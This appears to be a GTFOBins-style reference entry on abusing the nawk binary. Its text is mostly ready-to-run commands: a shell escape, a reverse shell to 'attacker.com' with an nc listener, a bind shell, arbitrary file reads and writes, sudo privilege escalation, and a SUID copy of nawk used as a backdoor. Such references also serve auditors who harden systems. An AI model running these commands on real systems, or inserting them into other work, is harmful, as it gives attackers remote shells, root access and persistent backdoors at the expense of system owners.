It can be used to break out from restricted environments by spawning an interactive system shell.
nawk 'BEGIN {system("/bin/sh")}'
It can send back a non-interactive reverse shell to a listening attacker to open a remote network access.
Run nc -l -p 12345
on the attacker box to receive the shell.
RHOST=attacker.com
RPORT=12345
nawk -v RHOST=$RHOST -v RPORT=$RPORT 'BEGIN {
s = "/inet/tcp/0/" RHOST "/" RPORT;
while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
It can bind a non-interactive shell to a local port to allow remote network access.
Run nc target.com 12345
on the attacker box to connect to the shell.
LPORT=12345
nawk -v LPORT=$LPORT 'BEGIN {
s = "/inet/tcp/" LPORT "/0/0";
while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
It writes data to files, it may be used to do privileged writes or write files outside a restricted file system.
LFILE=file_to_write
nawk -v LFILE=$LFILE 'BEGIN { print "DATA" > LFILE }'
It reads data from files, it may be used to do privileged reads or disclose files outside a restricted file system.
LFILE=file_to_read
nawk '//' "$LFILE"
It runs in privileged context and may be used to access the file system, escalate or maintain access with elevated privileges if enabled on sudo
.
sudo nawk 'BEGIN {system("/bin/sh")}'
It runs with the SUID bit set and may be exploited to access the file system, escalate or maintain access with elevated privileges working as a SUID backdoor. If it is used to run commands it only works on systems like Debian (<= Stretch) that allow the default sh
shell to run with SUID privileges.
sudo sh -c 'cp $(which nawk) .; chmod +s ./nawk'
./nawk 'BEGIN {system("/bin/sh")}'